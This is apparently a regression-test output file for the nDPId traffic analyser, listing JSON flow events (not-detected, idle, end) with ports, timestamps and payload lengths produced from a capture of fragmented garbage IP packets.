+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
